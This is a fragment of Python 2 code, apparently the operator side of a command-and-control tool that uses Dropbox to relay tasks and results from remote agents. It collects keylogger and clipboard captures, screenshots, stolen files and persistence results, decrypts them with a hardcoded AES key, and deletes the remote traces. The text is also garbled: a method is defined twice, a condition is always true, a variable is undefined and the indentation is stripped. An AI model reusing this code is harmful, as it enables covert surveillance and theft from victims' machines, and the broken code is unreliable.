def treatPushedData(self, pushedDataFilePath):
# Read the pushed data result file
result = Crypto.decryptData(
self.dropboxHandler.readFile(pushedDataFilePath,
resultFormat="bytes"),
self.statusHandler.masterKey)
# Error handling
if result is None:
print helpers.color(
"\n[!] Error retrieving data pushed by the agent ID [{}]".
format(agentID))
else:
print result
# Delete the push result file on the server
self.dropboxHandler.deleteFile(pushedDataFilePath)
def treatTaskResult(self, task, taskResultFilePath):
# We have a match for a pending task that has completed
agentID = task['agentID']
taskID = task['id']
args = task['args']
cmd = task['cmd']
proceed = True
# Read the task result file
result = Crypto.decryptData(
self.dropboxHandler.readFile(taskResultFilePath,
resultFormat="bytes"),
self.statusHandler.masterKey)
# Error handling
if result is None:
proceed = False
elif cmd != "runCLI" or cmd != "runModule":
if result.startswith("ERROR"):
print helpers.color(
"\n[!] Task ID [{}] on agent ID [{}] failed with error: [{}]"
.format(taskID, agentID, result))
proceed = False
# Proceed with task result treatment
if proceed:
if cmd == "runCLI":
#print helpers.color("\n[*] Task ID [{}] on agent ID [{}] completed".format(taskID, agentID))
#print "[{}]".format(task['cmd'])
#print ""
print result
if cmd == "runModule":
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed".format(
taskID, agentID))
print "[{}]".format(task['cmd'])
print ""
print result
elif cmd == "launchProcess":
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
elif cmd == "getFile":
agentFile = args[0]
# Compute a local file name based on the agent file name
localFile = os.path.join(
cfg.defaultPath['incoming'],
os.path.basename(agentFile.replace("\\", "/")))
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
print helpers.color(
"[*] Please wait while downloading file [{}] and saving it to [{}]"
.format(result, localFile))
with open(localFile, 'w+') as fileHandle:
fileHandle.write(
Crypto.decryptData(
self.dropboxHandler.readFile(result,
resultFormat="bytes"),
self.statusHandler.masterKey))
fileHandle.close()
# Delete the remote file
self.dropboxHandler.deleteFile(result)
print helpers.color("[*] File saved [{}]".format(localFile))
elif cmd == "sendFile":
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
print helpers.color("[*] [{}]".format(result))
elif cmd == "sleep":
self.statusHandler.setAgentAttribute(agentID, "wakeUpTime",
result.split(",")[1])
self.statusHandler.setAgentAttribute(agentID, "status",
"SLEEPING")
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
print helpers.color("[*] Agent is going to sleep")
elif cmd == "polling":
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
elif cmd == "stop":
self.statusHandler.setAgentAttribute(agentID, "status", "DEAD")
self.dropboxHandler.deleteFile(
self.statusHandler.getAgentAttribute(
agentID, "statusFile"))
self.dropboxHandler.deleteFile(
self.statusHandler.getAgentAttribute(
agentID, "commandFile"))
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
# Remove the task from the task list
self.statusHandler.removeTask(task)
# Delete the task result file on the server
self.dropboxHandler.deleteFile(taskResultFilePath)
def treatTaskResult(self, task, taskResultFilePath):
# We have a match for a pending task that has completed
agentID = task['agentID']
taskID = task['id']
args = task['args']
cmd = task['cmd']
proceed = True
# Read the task result file
key = 'secret#456!23key'
iv = 'Key@123Key@123fd'
enc_cmdresult = self.dropboxHandler.readFile(taskResultFilePath,
resultFormat="string")
decodetext = base64.b64decode(enc_cmdresult)
aes = AES.new(key, AES.MODE_CBC, iv)
encoder = PKCS7Encoder()
cipher = aes.decrypt(decodetext)
result = encoder.decode(cipher)
# Error handling
if result is None:
proceed = False
elif cmd not in ['runCLI', 'runPSModule']:
if result.startswith("ERROR"):
print helpers.color(
"\n[!] Task ID [{}] on agent ID [{}] failed with error: [{}]"
.format(taskID, agentID, result))
proceed = False
# Proceed with task result treatment
if proceed:
if cmd in ['runCLI', 'runPSModule']:
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed".format(
taskID, agentID))
print "[{}]".format(task['cmd'])
print ""
print result
elif cmd in [
'launchProcess', 'polling', 'sendkeystrokes', 'persist'
]:
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
elif cmd == "getFile":
agentFile = args[0]
# Compute a local file name based on the agent file name
localFile = os.path.join(
cfg.defaultPath['incoming'],
os.path.basename(agentFile.replace("\\", "/")))
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
print helpers.color(
"[*] Please wait while downloading file [{}] and saving it to [{}]"
.format(result, localFile))
with open(localFile, 'w+') as fileHandle:
fileHandle.write(
self.dropboxHandler.readFile(result,
resultFormat="string"))
fileHandle.close()
print helpers.color("[*] File saved [{}]".format(localFile))
# Delete the remote file
self.dropboxHandler.deleteFile(result)
elif cmd == "sendFile":
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
print helpers.color("\n[*] [{}]".format(result))
elif cmd == "sleep":
self.statusHandler.setAgentAttribute(agentID, "wakeUpTime",
result.split(",")[1])
self.statusHandler.setAgentAttribute(agentID, "status",
"SLEEPING")
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
print helpers.color("[*] Agent is going to sleep")
elif cmd == "keylogger":
if args[0] == "stop":
localFile = os.path.join(cfg.defaultPath['incoming'],
"keylogger.txt")
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully"
.format(taskID, agentID))
print helpers.color(
"[*] Saving keylogger results to file [{}]".format(
localFile))
with open(localFile, 'w+') as fileHandle:
fileHandle.write(result)
fileHandle.close()
print helpers.color(
"[*] File saved [{}]".format(localFile))
else:
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
elif cmd == "clipboardlogger":
if args[0] == "stop":
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully"
.format(taskID, agentID))
localFile = os.path.join(cfg.defaultPath['incoming'],
"clipboardlogger.txt")
print helpers.color(
"[*] Saving clipboard logger results to file [{}]".
format(localFile))
with open(localFile, 'w+') as fileHandle:
fileHandle.write(result)
fileHandle.close()
print helpers.color(
"[*] File saved [{}]".format(localFile))
else:
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
elif cmd == "screenshot":
# Compute a local file name based on the agent file name
localFile = os.path.join(cfg.defaultPath['incoming'],
"screenshot.jpg")
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
print helpers.color(
"[*] Please wait while downloading file [{}] and saving it to [{}]"
.format(result, localFile))
with open(localFile, 'w+') as fileHandle:
fileHandle.write(
Crypto.decryptData(
self.dropboxHandler.readFile(result,
resultFormat="bytes"),
self.statusHandler.masterKey))
fileHandle.close()
print helpers.color("[*] File saved [{}]".format(localFile))
# Delete the remote file
self.dropboxHandler.deleteFile(result)
elif cmd == "stop":
self.statusHandler.setAgentAttribute(agentID, "status", "DEAD")
self.dropboxHandler.deleteFile(
self.statusHandler.getAgentAttribute(
agentID, "statusFile"))
self.dropboxHandler.deleteFile(
self.statusHandler.getAgentAttribute(
agentID, "commandFile"))
print helpers.color(
"\n[*] Task ID [{}] on agent ID [{}] completed successfully [{}]"
.format(taskID, agentID, result))
# Remove the task from the task list
self.statusHandler.removeTask(task)
# Delete the task result file on the server
self.dropboxHandler.deleteFile(taskResultFilePath)
